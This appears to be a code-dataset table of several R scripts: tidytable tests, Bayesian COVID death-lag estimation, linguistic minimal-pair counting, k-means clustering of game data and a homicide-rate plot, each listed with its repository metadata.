content large_stringlengths 0 6.46M | path large_stringlengths 3 331 | license_type large_stringclasses 2 values | repo_name large_stringlengths 5 125 | language large_stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 4 6.46M | extension large_stringclasses 75 values | text stringlengths 0 6.46M |
|---|---|---|---|---|---|---|---|---|---|
# Tests for tidytable::unite.(), which pastes several character columns
# into a single column. Every test uses the same 3-row table with an NA
# in column `c`.
test_that("works with no input & works with NA", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
# With no arguments all columns are united into "new_col" and NA is
# pasted as the literal string "NA".
unite_df <- test_df %>%
unite.()
expect_named(unite_df, c("new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b_NA", "a_b_c"))
})
test_that("works with selected cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
# Only a:b are united; the untouched column `c` is kept.
unite_df <- test_df %>%
unite.("new_col", a:b)
expect_named(unite_df, c("c", "new_col"))
expect_equal(unite_df$new_col, c("a_b", "a_b", "a_b"))
})
test_that("na.rm works", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
# na.rm = TRUE drops missing values before pasting instead of writing "NA".
unite_df <- test_df %>%
unite.("new_col", a:c, na.rm = TRUE)
expect_named(unite_df, "new_col")
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("can keep cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
# remove = FALSE keeps the source columns alongside the united column.
unite_df <- test_df %>%
unite.("new_col", a:c, remove = FALSE, na.rm = TRUE)
expect_named(unite_df, c("a", "b", "c", "new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("doesn't modify-by-reference", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
# The result is deliberately discarded; the input must be left untouched
# (tidytable builds on data.table, which can modify by reference).
test_df %>%
unite.("new_col", a:b, na.rm = TRUE)
expect_named(test_df, c("a", "b", "c"))
})
| /tests/testthat/test-unite.R | permissive | lionel-/tidytable | R | false | false | 1,645 | r | test_that("works with no input & works with NA", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.()
expect_named(unite_df, c("new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b_NA", "a_b_c"))
})
test_that("works with selected cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:b)
expect_named(unite_df, c("c", "new_col"))
expect_equal(unite_df$new_col, c("a_b", "a_b", "a_b"))
})
test_that("na.rm works", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, na.rm = TRUE)
expect_named(unite_df, "new_col")
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("can keep cols", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
unite_df <- test_df %>%
unite.("new_col", a:c, remove = FALSE, na.rm = TRUE)
expect_named(unite_df, c("a", "b", "c", "new_col"))
expect_equal(unite_df$new_col, c("a_b_c", "a_b", "a_b_c"))
})
test_that("doesn't modify-by-reference", {
test_df <- tidytable(a = c("a", "a", "a"),
b = c("b", "b", "b"),
c = c("c", NA, "c"))
test_df %>%
unite.("new_col", a:b, na.rm = TRUE)
expect_named(test_df, c("a", "b", "c"))
})
|
library(R2jags)
library(lubridate)
library(tidyverse)
library(RColorBrewer)
library(vroom)
# Loads the input objects used below: `covid_def`, `fechas_val`,
# `sem_min_fit` and `mod` — presumably defined there; TODO confirm.
source("_00_initialization.R")
# Obtains the lags between date of death and date of the data snapshot,
# restricted to Mexico City (ENTIDAD_RES == "09"), binned into weeks.
covid_def_lag <-
covid_def %>%
filter(ENTIDAD_RES == "09") %>%
mutate(SEMANA_DEF = as.numeric(cut(FECHA_DEF, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(SEMANA_ACTUALIZACION = as.numeric(cut(FECHA_ACTUALIZACION, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(lag_dia = as.numeric(FECHA_ACTUALIZACION - FECHA_DEF)) %>%
mutate(lag_semana = SEMANA_ACTUALIZACION - SEMANA_DEF) %>%
select(ID_REGISTRO, FECHA_DEF, FECHA_ACTUALIZACION, SEMANA_DEF, SEMANA_ACTUALIZACION, lag_dia, lag_semana) %>%
filter(!is.na(SEMANA_DEF)) %>%
arrange(lag_semana)
# Fit one model per validation snapshot date.
for (ii in 1:length(fechas_val)) {
maxfecha <- fechas_val[ii]
# NOTE(review): this local `wday` shadows lubridate::wday inside the loop.
wday <- wday(maxfecha, week_start=1)
# Do not consider the last week unless it is complete
# (the snapshot has to be a Sunday to enter the analysis)
maxsemana <- unique(covid_def_lag$SEMANA_ACTUALIZACION[covid_def_lag$FECHA_ACTUALIZACION == maxfecha])
if (wday == 7) {
maxsemana <- maxsemana
} else {
maxsemana <- maxsemana - 1
}
print(paste("Starting", maxfecha, "----------------------------------"))
# Counts of deaths by death-week and reporting lag, with the per-week
# total N; lag 0 is excluded.  group_by() with no arguments ungroups.
covid_def_lag_2 <-
covid_def_lag %>%
filter(SEMANA_ACTUALIZACION <= maxsemana) %>%
filter(SEMANA_DEF >= sem_min_fit) %>%
group_by(SEMANA_DEF, lag_semana) %>%
summarise(n=n()) %>%
group_by() %>%
filter( lag_semana>0) %>%
group_by(SEMANA_DEF) %>%
mutate(N=sum(n)) %>%
group_by() %>%
arrange(SEMANA_DEF, lag_semana)
covid_def_lag_2 %>% group_by(SEMANA_DEF) %>% summarise(sum(n)) %>% print(n=100)
# Build the data for estimation in JAGS:
semanas <- sort(unique(covid_def_lag_2$SEMANA_DEF))
lags <- rev(max(semanas) - semanas + 1)
I <- length(semanas)
Jmax <- length(lags)
# Y[i, j]: deaths in week i reported at lag j; the unobserved lower-right
# triangle stays NA (recent weeks have fewer observed lags).
Y <- matrix(rep(NA, I * Jmax), nrow = I)
for (i in 1:I) {
for (j in 1:(Jmax-i+1)) {
sem <- semanas[i]
lag <- lags[j]
jd_temp <- covid_def_lag_2 %>% filter(SEMANA_DEF == sem, lag_semana == lag)
if (length(jd_temp$SEMANA_DEF) == 0) {
yi <- 0
} else {
yi <- jd_temp$n
}
Y[i, j] <- yi
}
}
J <- Jmax:1
N <- rowSums(Y, na.rm=TRUE)
jags.data <- list(Y=Y, N=N, J=J, Jmax=Jmax, I=I)
# Prior
jags.data$alpha <- colSums(jags.data$Y, na.rm = TRUE)
#jags.data$alpha <- c(1000, rep(.01, Jmax-1))
# Parameters to monitor depend on which model file is being fit.
if (mod == "model32" ) {
est_params <- c("NN", "p")
} else if(mod == "model33") {
est_params <- c("NN", "p", "l", "k")
}else if(mod == "model31") {
est_params <- c("NN", "p", "beta")
} else if (mod == "model32_1") {
est_params <- c("NN", "p")
} else if (mod == "model34") {
est_params <- c("NN", "p")
}
# Run 4 parallel MCMC chains and save the fitted object per snapshot date.
modelo <- do.call(jags.parallel, list(data = jags.data,
model.file=mod,
parameters.to.save=est_params,
DIC=FALSE,
n.chains=4, n.iter = 40000, n.burnin=20000,n.thin=100))
save(modelo, file = paste("mcmc_def/",mod,"_sem_cdmx/", maxfecha, "-",mod,".RData", sep=""))
}
| /_10_estimacion_def_sem_cdmx.R | no_license | humbertog/covid_mex | R | false | false | 3,328 | r | library(R2jags)
library(lubridate)
library(tidyverse)
library(RColorBrewer)
library(vroom)
source("_00_initialization.R")
# Obtains the lags
covid_def_lag <-
covid_def %>%
filter(ENTIDAD_RES == "09") %>%
mutate(SEMANA_DEF = as.numeric(cut(FECHA_DEF, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(SEMANA_ACTUALIZACION = as.numeric(cut(FECHA_ACTUALIZACION, seq(as.Date("2020-03-02"), as.Date("2021-12-26"), by="1 week")))) %>%
mutate(lag_dia = as.numeric(FECHA_ACTUALIZACION - FECHA_DEF)) %>%
mutate(lag_semana = SEMANA_ACTUALIZACION - SEMANA_DEF) %>%
select(ID_REGISTRO, FECHA_DEF, FECHA_ACTUALIZACION, SEMANA_DEF, SEMANA_ACTUALIZACION, lag_dia, lag_semana) %>%
filter(!is.na(SEMANA_DEF)) %>%
arrange(lag_semana)
for (ii in 1:length(fechas_val)) {
maxfecha <- fechas_val[ii]
wday <- wday(maxfecha, week_start=1)
# No considera ultima semana, al menos que sea completa
# (la base tiene que ser domingo para entrar en el analisis)
maxsemana <- unique(covid_def_lag$SEMANA_ACTUALIZACION[covid_def_lag$FECHA_ACTUALIZACION == maxfecha])
if (wday == 7) {
maxsemana <- maxsemana
} else {
maxsemana <- maxsemana - 1
}
print(paste("Starting", maxfecha, "----------------------------------"))
covid_def_lag_2 <-
covid_def_lag %>%
filter(SEMANA_ACTUALIZACION <= maxsemana) %>%
filter(SEMANA_DEF >= sem_min_fit) %>%
group_by(SEMANA_DEF, lag_semana) %>%
summarise(n=n()) %>%
group_by() %>%
filter( lag_semana>0) %>%
group_by(SEMANA_DEF) %>%
mutate(N=sum(n)) %>%
group_by() %>%
arrange(SEMANA_DEF, lag_semana)
covid_def_lag_2 %>% group_by(SEMANA_DEF) %>% summarise(sum(n)) %>% print(n=100)
# Crea los datos para estimacion en Jags:
semanas <- sort(unique(covid_def_lag_2$SEMANA_DEF))
lags <- rev(max(semanas) - semanas + 1)
I <- length(semanas)
Jmax <- length(lags)
Y <- matrix(rep(NA, I * Jmax), nrow = I)
for (i in 1:I) {
for (j in 1:(Jmax-i+1)) {
sem <- semanas[i]
lag <- lags[j]
jd_temp <- covid_def_lag_2 %>% filter(SEMANA_DEF == sem, lag_semana == lag)
if (length(jd_temp$SEMANA_DEF) == 0) {
yi <- 0
} else {
yi <- jd_temp$n
}
Y[i, j] <- yi
}
}
J <- Jmax:1
N <- rowSums(Y, na.rm=TRUE)
jags.data <- list(Y=Y, N=N, J=J, Jmax=Jmax, I=I)
# Prior
jags.data$alpha <- colSums(jags.data$Y, na.rm = TRUE)
#jags.data$alpha <- c(1000, rep(.01, Jmax-1))
if (mod == "model32" ) {
est_params <- c("NN", "p")
} else if(mod == "model33") {
est_params <- c("NN", "p", "l", "k")
}else if(mod == "model31") {
est_params <- c("NN", "p", "beta")
} else if (mod == "model32_1") {
est_params <- c("NN", "p")
} else if (mod == "model34") {
est_params <- c("NN", "p")
}
modelo <- do.call(jags.parallel, list(data = jags.data,
model.file=mod,
parameters.to.save=est_params,
DIC=FALSE,
n.chains=4, n.iter = 40000, n.burnin=20000,n.thin=100))
save(modelo, file = paste("mcmc_def/",mod,"_sem_cdmx/", maxfecha, "-",mod,".RData", sep=""))
}
|
##' Convert data into mcstate format; this is a thin wrapper around
##' [mcstate::particle_filter_data()] which adds a dummy step in front
##' of the first data point so that we can use the previous state and
##' the current states to convert cumulative measures into net daily
##' changes.
##'
##' @title Prepare data for mcstate
##'
##' @param data A `data.frame` object suitable for
##'   [mcstate::particle_filter_data()]
##'
##' @param start_date The start date, as a [sircovid_date()], R "Date"
##'   object or a string in ISO 8601 format (YYYY-MM-DD)
##'
##' @param dt The time step (fraction of a day that each step
##'   represents) as used to create the model object
##'
##' @return A data.frame suitable for use with `mcstate` functions
##'   such as [mcstate::particle_filter()] and [mcstate::pmcmc()]
##'
##' @export
##' @examples
##' # A data set that has data from the first of February to the first of
##' # March (one column of data called 'x')
##' from <- as.Date("2020-02-01")
##' to <- as.Date("2020-03-01")
##' d <- data.frame(date = seq(from, to, by = 1),
##'                 x = runif(to - from + 1),
##'                 stringsAsFactors = FALSE)
##'
##' # Get this ready for sircovid/mcstate assuming the seeding starts on
##' # the 15th of January and we take 4 steps per day.
##' sircovid_data(d, start_date = "2020-01-15", 1 / 4)
sircovid_data <- function(data, start_date, dt) {
start_date <- as_sircovid_date(start_date)
## Some horrid off-by-one unpleasantness lurking here. See this commit:
## https://github.com/mrc-ide/mcstate/commit/97e68ad
## for more details, and the accompanying PR.
##
## To make this work, we've manually inserted a fake reporting
## period at the first row of the file so that our compare works
## correctly; this should be something that mcstate can do for us.
data$date <- sircovid_date(data$date)
## rate is steps per day (inverse of the day fraction per step).
rate <- 1 / dt
data <- mcstate::particle_filter_data(data, "date", rate, start_date)
data
}
| /R/data.R | permissive | mrc-ide/sircovid2 | R | false | false | 1,980 | r | ##' Convert data into mcstate format; this is a thin wrapper around
##' [mcstate::particle_filter_data()] which adds a dummy step in front
##' of the first data point so that we can use the previous state and
##' the current states to convert cumulative measures into net daily
##' changes.
##'
##' @title Prepare data for mcstate
##'
##' @param data A `data.frame` object suitable for
##' [mcstate::particle_filter_data()]
##'
##' @param start_date The start date, as a [sircovid_date()], R "Date"
##' object or a string in ISO 8601 format (YYYY-MM-DD)
##'
##' @param dt The time step (fraction of a day that each step
##' represents) as used to create the model object
##'
##' @return A data.frame suitable for use with `mcstate` functions
##' such as [mcstate::particle_filter()] and [mcstate::pmcmc()]
##'
##' @export
##' @examples
##' # A data sert that has data from the first of February to the first of
##' # March (one column of data called 'x')
##' from <- as.Date("2020-02-01")
##' to <- as.Date("2020-03-01")
##' d <- data.frame(date = seq(from, to, by = 1),
##' x = runif(to - from + 1),
##' stringsAsFactors = FALSE)
##'
##' # Get this ready for sircovid/mcstate assuming the seeding starts on
##' # the 15th of January and we take 4 steps per day.
##' sircovid_data(d, start_date = "2020-01-15", 1 / 4)
sircovid_data <- function(data, start_date, dt) {
start_date <- as_sircovid_date(start_date)
## Some horrid off-by-one unpleasantness lurking here. See this commit:
## https://github.com/mrc-ide/mcstate/commit/97e68ad
## for for more details, and the accompanying PR.
##
## To make this work, we've manually inserted a fake reporting
## period at the first row of the file so that our compare works
## correctly; this should be something that mcstate can do for us.
data$date <- sircovid_date(data$date)
rate <- 1 / dt
data <- mcstate::particle_filter_data(data, "date", rate, start_date)
data
}
|
# Finds all minimal pairs in the StarLing lexicon data and tallies them
# per language.  Expects `starling`, `starling.segs`, `starling.nohoms`,
# `starling.all.segs` and the helpers tokenize.word()/min.pair() to be in
# scope — presumably created by min_pair_functions.R or an earlier
# loading script; TODO confirm.
source("min_pair_functions.R")
# create a data frame to hold minimal pairs and populate it
starling.min.pairs = data.frame(Language = c(), Seg1 = c(), Phon1 = c(), Seg2 = c(), Phon2 = c(), stringsAsFactors = F)
# for each language,
for(i in 1:nrow(starling.segs)) {
# get the language data
lang.id = starling.segs$Language[i]
lang = starling.segs$Language[i]
subtable = starling.nohoms[starling.nohoms$Language == lang.id & starling.nohoms$PhonStrip != "",]
current.segs = as.character(unlist(strsplit(starling.segs$Segs[i], " ")))
# tokenize all the words into characters (so that this isn't done repeatedly
# inside the following loop)
tokenized.words = list()
for(j in 1:nrow(subtable)) {
tokenized.words[[j]] = tokenize.word(subtable$PhonStrip[j], segs = current.segs)
subtable$Length[j] = length(tokenized.words[[j]])
}
# for each word length of the language,
# (only lengths attested by at least two words can contain a minimal pair)
for(j in as.numeric(names(table(subtable$Length)[as.numeric(table(subtable$Length)) > 1]))) {
subsubtable = subtable[subtable$Length == j,]
sub.tokenized.words = tokenized.words[unlist(lapply(tokenized.words, length)) == j]
# for each word of that length in the language,
# (pairwise comparison: O(n^2) in the number of same-length words)
for(k in 1:(nrow(subsubtable) - 1)) {
phon1 = sub.tokenized.words[[k]]
phonString1 = subsubtable$PhonStrip[k]
# for each other word of that length in the language,
for(l in (k + 1):nrow(subsubtable)) {
phon2 = sub.tokenized.words[[l]]
phonString2 = subsubtable$PhonStrip[l]
# check whether the words are a minimal pair
starling.min.segs = min.pair(phon1, phon2)
# if so,
if(starling.min.segs[1] != "" & starling.min.segs[2] != "") {
# print the minimal pair and store it in the data frame
# NOTE(review): rbind() inside a loop grows the frame quadratically;
# accumulating rows in a list and binding once would be faster.
print(paste(lang, phonString1, phonString2))
starling.min.pairs = rbind(starling.min.pairs, data.frame(Language = lang.id, Seg1 = starling.min.segs[1], Phon1 = phonString1, Seg2 = starling.min.segs[2], Phon2 = phonString2, stringsAsFactors = F))
}
}
}
}
}
rm(i, lang.id, lang, subtable, current.segs, tokenized.words, j, subsubtable, sub.tokenized.words, k, phon1, phonString1, l, phon2, phonString2, starling.min.segs)
# add one more field to the data frame, which pastes together the two
# contrasting segments of each minimal pair - for any pair of segments, it
# always combines them in the same order, which makes this field useful for
# getting overall counts
starling.min.pairs$Contrast = ""
for(s in starling.all.segs) {
starling.min.pairs$Contrast = ifelse(starling.min.pairs$Seg1 == s | starling.min.pairs$Seg2 == s, ifelse(starling.min.pairs$Contrast == "", s, paste(starling.min.pairs$Contrast, "_", s, sep = "")), starling.min.pairs$Contrast)
}
rm(s)
# write the data frame to a csv file (just in case)
write.csv(starling.min.pairs, "starling_min_pairs.csv")
# create a data frame for storing total minimal pair counts by language; include
# separate counts for all minimal pairs and for minimal pairs that are at least
# 3 characters long (to avoid counting affixes that are listed by themselves)
starling.min.pair.counts = data.frame(Language = names(table(starling$Language)))
starling.min.pair.counts$StdLangName = ""
starling.min.pair.counts$Vocab = 0
starling.min.pair.counts$MinPairs = 0
starling.min.pair.counts$LongMinPairs = 0
# for each language,
for(i in 1:nrow(starling.min.pair.counts)) {
# get the total recorded vocabulary size for the language
starling.min.pair.counts$Vocab[i] = nrow(starling[starling$Language == starling.min.pair.counts$Language[i],])
# get the size of the segment inventory
# (assumes starling.segs rows align with starling.min.pair.counts rows —
# TODO confirm the two tables share the same language ordering)
starling.min.pair.counts$NumSegs[i] = length(unlist(strsplit(starling.segs$Segs[i], " ")))
# get the mean and median word length
starling.min.pair.counts$MeanWordLength[i] = mean(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
starling.min.pair.counts$MedianWordLength[i] = median(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
# get the number of minimal pairs observed for the language
starling.min.pair.counts$MinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i],])
starling.min.pair.counts$LongMinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i] & nchar(starling.min.pairs$Phon1) > 2 & nchar(starling.min.pairs$Phon2) > 2,])
}
rm(i)
# write the results to a csv file (just in case)
write.csv(starling.min.pair.counts, "starling_min_pair_counts.csv")
| /load_min_pairs_starling.R | no_license | kaplanas/Minimal-Pair-Counts | R | false | false | 4,594 | r | source("min_pair_functions.R")
# create a data frame to hold minimal pairs and populate it
starling.min.pairs = data.frame(Language = c(), Seg1 = c(), Phon1 = c(), Seg2 = c(), Phon2 = c(), stringsAsFactors = F)
# for each language,
for(i in 1:nrow(starling.segs)) {
# get the language data
lang.id = starling.segs$Language[i]
lang = starling.segs$Language[i]
subtable = starling.nohoms[starling.nohoms$Language == lang.id & starling.nohoms$PhonStrip != "",]
current.segs = as.character(unlist(strsplit(starling.segs$Segs[i], " ")))
# tokenize all the words into characters (so that this isn't done repeatedly
# inside the following loop)
tokenized.words = list()
for(j in 1:nrow(subtable)) {
tokenized.words[[j]] = tokenize.word(subtable$PhonStrip[j], segs = current.segs)
subtable$Length[j] = length(tokenized.words[[j]])
}
# for each word length of the language,
for(j in as.numeric(names(table(subtable$Length)[as.numeric(table(subtable$Length)) > 1]))) {
subsubtable = subtable[subtable$Length == j,]
sub.tokenized.words = tokenized.words[unlist(lapply(tokenized.words, length)) == j]
# for each word of that length in the language,
for(k in 1:(nrow(subsubtable) - 1)) {
phon1 = sub.tokenized.words[[k]]
phonString1 = subsubtable$PhonStrip[k]
# for each other word of that length in the language,
for(l in (k + 1):nrow(subsubtable)) {
phon2 = sub.tokenized.words[[l]]
phonString2 = subsubtable$PhonStrip[l]
# check whether the words are a minimal pair
starling.min.segs = min.pair(phon1, phon2)
# if so,
if(starling.min.segs[1] != "" & starling.min.segs[2] != "") {
# print the minimal pair and store it in the data frame
print(paste(lang, phonString1, phonString2))
starling.min.pairs = rbind(starling.min.pairs, data.frame(Language = lang.id, Seg1 = starling.min.segs[1], Phon1 = phonString1, Seg2 = starling.min.segs[2], Phon2 = phonString2, stringsAsFactors = F))
}
}
}
}
}
rm(i, lang.id, lang, subtable, current.segs, tokenized.words, j, subsubtable, sub.tokenized.words, k, phon1, phonString1, l, phon2, phonString2, starling.min.segs)
# add one more field to the data frame, which pastes together the two
# contrasting segments of each minimal pair - for any pair of segments, it
# always combines them in the same order, which makes this field useful for
# getting overall counts
starling.min.pairs$Contrast = ""
for(s in starling.all.segs) {
starling.min.pairs$Contrast = ifelse(starling.min.pairs$Seg1 == s | starling.min.pairs$Seg2 == s, ifelse(starling.min.pairs$Contrast == "", s, paste(starling.min.pairs$Contrast, "_", s, sep = "")), starling.min.pairs$Contrast)
}
rm(s)
# write the data frame to a csv file (just in case)
write.csv(starling.min.pairs, "starling_min_pairs.csv")
# create a data frame for storing total minimal pair counts by language; include
# separate counts for all minimal pairs and for minimal pairs that are at least
# 3 characters long (to avoid counting affixes that are listed by themselves)
starling.min.pair.counts = data.frame(Language = names(table(starling$Language)))
starling.min.pair.counts$StdLangName = ""
starling.min.pair.counts$Vocab = 0
starling.min.pair.counts$MinPairs = 0
starling.min.pair.counts$LongMinPairs = 0
# for each language,
for(i in 1:nrow(starling.min.pair.counts)) {
# get the total recorded vocabulary size for the language
starling.min.pair.counts$Vocab[i] = nrow(starling[starling$Language == starling.min.pair.counts$Language[i],])
# get the size of the segment inventory
starling.min.pair.counts$NumSegs[i] = length(unlist(strsplit(starling.segs$Segs[i], " ")))
# get the mean and median word length
starling.min.pair.counts$MeanWordLength[i] = mean(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
starling.min.pair.counts$MedianWordLength[i] = median(starling.nohoms$Length[starling.nohoms$Language == starling.min.pair.counts$Language[i]])
# get the number of minimal pairs observed for the language
starling.min.pair.counts$MinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i],])
starling.min.pair.counts$LongMinPairs[i] = nrow(starling.min.pairs[starling.min.pairs$Language == starling.min.pair.counts$Language[i] & nchar(starling.min.pairs$Phon1) > 2 & nchar(starling.min.pairs$Phon2) > 2,])
}
rm(i)
# write the results to a csv file (just in case)
write.csv(starling.min.pair.counts, "starling_min_pair_counts.csv")
|
# Example usage of psych::SD (extracted from the package's SD.Rd file).
library(psych)
### Name: SD
### Title: Find the Standard deviation for a vector, matrix, or data.frame
### - do not return error if there are no cases
### Aliases: SD
### Keywords: models
### ** Examples
data(attitude)
apply(attitude,2,sd) #all complete
# Knock out an entire column so one variable has no complete cases;
# SD() should handle this where base sd() would not.
attitude[,1] <- NA
SD(attitude) #missing a column
describe(attitude)
| /data/genthat_extracted_code/psych/examples/SD.Rd.R | no_license | surayaaramli/typeRrh | R | false | false | 332 | r | library(psych)
### Name: SD
### Title: Find the Standard deviation for a vector, matrix, or data.frame
### - do not return error if there are no cases
### Aliases: SD
### Keywords: models
### ** Examples
data(attitude)
apply(attitude,2,sd) #all complete
attitude[,1] <- NA
SD(attitude) #missing a column
describe(attitude)
|
library(dplyr)

# Load the match data, dropping the gameId column (an identifier, not a
# feature to cluster on).
lol <- select(read.csv("high_diamond_ranked_10min.csv"), -gameId)

# Elbow plot: total within-cluster sum of squares for k = 1..10 clusters.
# Used interactively to pick k before fitting the final model.
wss_plot <- function() {
  # Preallocate locally instead of growing a global vector (the original
  # global `wss` was never updated anyway, due to copy-on-modify).
  wss <- numeric(10)
  for (i in seq_len(10)) {
    km.out <- kmeans(lol, centers = i, nstart = 20, iter.max = 50)
    wss[i] <- km.out$tot.withinss
  }
  plot(1:10, wss, type = "b",
       xlab = "Number of Clusters",
       ylab = "Within groups sum of squares")
}
# uncomment the following to produce wss plot and find k
# wss_plot()

# assign number of clusters from wss plot
k <- 3

# Build model with k clusters: km.out
km.out <- kmeans(lol, centers = k, nstart = 20, iter.max = 50)

# View the resulting model
km.out

# Plot of blueExperienceDiff vs. blueGoldDiff by cluster membership.
plot(lol[, c("blueExperienceDiff", "blueGoldDiff")],
     col = km.out$cluster,
     main = paste("k-means clustering of League of Legends with", k, "clusters"),
     xlab = "blueExperienceDiff",
     ylab = "blueGoldDiff")  # bug fix: y axis plots gold diff, not experience diff
| /kmeans.R | no_license | zifangu/surf-2020 | R | false | false | 1,034 | r | library(dplyr)
# load csv into a data frame, omit gameID column
lol <- select(read.csv("high_diamond_ranked_10min.csv"), -gameId)
# select number of clusters using total within sum square error
wss <- 0
wss_plot <- function () {
for (i in 1:10) {
km.out <- kmeans(lol, centers = i, nstart = 20, iter.max = 50)
wss[i] <- km.out$tot.withinss
}
plot(1:10, wss, type = "b",
xlab = "Number of Clusters",
ylab = "Within groups sum of squares")
}
# uncomment the following to produce wss plot and find k
# wss_plot()
# assign number of clusters from wss plot
k <- 3
# Build model with k clusters: km.out
km.out <- kmeans(lol, centers = k, nstart = 20, iter.max = 50)
# View the resulting model
km.out
# Plot of Defense vs. Speed by cluster membership
plot(lol[, c("blueExperienceDiff", "blueGoldDiff")],
col = km.out$cluster,
main = paste("k-means clustering of League of Legends with", k, "clusters"),
xlab = "blueExperienceDiff", ylab = "blueExperienceDiff")
|
##########################################################
# author: Ignacio Sarmiento-Barbieri
#
# Figure 3: homicide rates per square mile, by city and year.
##########################################################
#Clean the workspace
rm(list=ls())
cat("\014")
local({r <- getOption("repos"); r["CRAN"] <- "http://cran.r-project.org"; options(repos=r)}) #set repo
#Load Packages
pkg<-list("dplyr","ggplot2")
lapply(pkg, require, character.only=T)
rm(pkg)
#Wd
setwd("~/Dropbox/Phd Illinois/Research/Neigh_crime/Unlocking_amenities/github/Unlocking-Amenities/")
TD<-readRDS("stores/data_unlocking_amenities_responses.rds")
TD<-data.frame(TD)
TD<- TD %>% ungroup()
# One homicide total per city-year.  min() is used to pull out the value,
# which assumes total_city.homicides is constant within each city-year
# group — TODO confirm against the stored data.
Homicides<-TD %>% group_by(city,year) %>% summarize(homicides=min(total_city.homicides)) %>% ungroup()
# Convert counts to homicides per square mile using city land areas:
#Chicago area: 234 mi²
#NY area: 304.6 mi²
#Philadelphia area: 141.7 mi²
Homicides$homicides[Homicides$city=="Chicago"]<-Homicides$homicides[Homicides$city=="Chicago"]/234
Homicides$homicides[Homicides$city=="NY"]<-Homicides$homicides[Homicides$city=="NY"]/304.6
Homicides$homicides[Homicides$city=="Philly"]<-Homicides$homicides[Homicides$city=="Philly"]/141.7
# One line per city, labeled directly at the right end of each series
# instead of with a legend.
ggplot(Homicides,aes(year, homicides, group=city,linetype=factor(city) ) )+
geom_line( size=.25) +
#scale_linetype_manual(name="",values=c("dashed","solid","dotted"),labels=c("Chicago","New York","Philadelphia"))+
geom_text(data = Homicides %>% filter(year == last(year)),
aes(label = c("Chicago","New York","Philadelphia"), x = year -0.4 , y = homicides +0.15), size=1.5) +
xlab("Year") +
ylab("Homicides Rate") +
scale_x_continuous(breaks = seq(2001, 2016, by=1)) +
expand_limits(y=0) +
theme_bw() +
ylim(0.5,3.5) +
theme(
axis.ticks.x=element_blank(),
panel.grid.minor.x=element_blank(),
axis.ticks.y=element_blank(),
panel.grid.major = element_line(size = 0.1),
legend.justification=c(.95,.95),
legend.position="none",#c(.95,.95),
text = element_text(size=4,family="Times"))
# Small output size because the figure is embedded in a paper.
ggsave("views/fig3.jpg", height = 1.5, width = 2.7, units="in")
| /scripts/Figures/Fig3.R | no_license | uiuc-bdeep/Unlocking-Amenities | R | false | false | 1,996 | r | ##########################################################
# author: Ignacio Sarmiento-Barbieri
#
##########################################################
#Clean the workspace
rm(list=ls())
cat("\014")
local({r <- getOption("repos"); r["CRAN"] <- "http://cran.r-project.org"; options(repos=r)}) #set repo
#Load Packages
pkg<-list("dplyr","ggplot2")
lapply(pkg, require, character.only=T)
rm(pkg)
#Wd
setwd("~/Dropbox/Phd Illinois/Research/Neigh_crime/Unlocking_amenities/github/Unlocking-Amenities/")
TD<-readRDS("stores/data_unlocking_amenities_responses.rds")
TD<-data.frame(TD)
TD<- TD %>% ungroup()
Homicides<-TD %>% group_by(city,year) %>% summarize(homicides=min(total_city.homicides)) %>% ungroup()
#Chicago area: 234 mi²
#NY area: 304.6 mi²
#Philadelphia area: 141.7 mi²
Homicides$homicides[Homicides$city=="Chicago"]<-Homicides$homicides[Homicides$city=="Chicago"]/234
Homicides$homicides[Homicides$city=="NY"]<-Homicides$homicides[Homicides$city=="NY"]/304.6
Homicides$homicides[Homicides$city=="Philly"]<-Homicides$homicides[Homicides$city=="Philly"]/141.7
ggplot(Homicides,aes(year, homicides, group=city,linetype=factor(city) ) )+
geom_line( size=.25) +
#scale_linetype_manual(name="",values=c("dashed","solid","dotted"),labels=c("Chicago","New York","Philadelphia"))+
geom_text(data = Homicides %>% filter(year == last(year)),
aes(label = c("Chicago","New York","Philadelphia"), x = year -0.4 , y = homicides +0.15), size=1.5) +
xlab("Year") +
ylab("Homicides Rate") +
scale_x_continuous(breaks = seq(2001, 2016, by=1)) +
expand_limits(y=0) +
theme_bw() +
ylim(0.5,3.5) +
theme(
axis.ticks.x=element_blank(),
panel.grid.minor.x=element_blank(),
axis.ticks.y=element_blank(),
panel.grid.major = element_line(size = 0.1),
legend.justification=c(.95,.95),
legend.position="none",#c(.95,.95),
text = element_text(size=4,family="Times"))
ggsave("views/fig3.jpg", height = 1.5, width = 2.7, units="in")
|
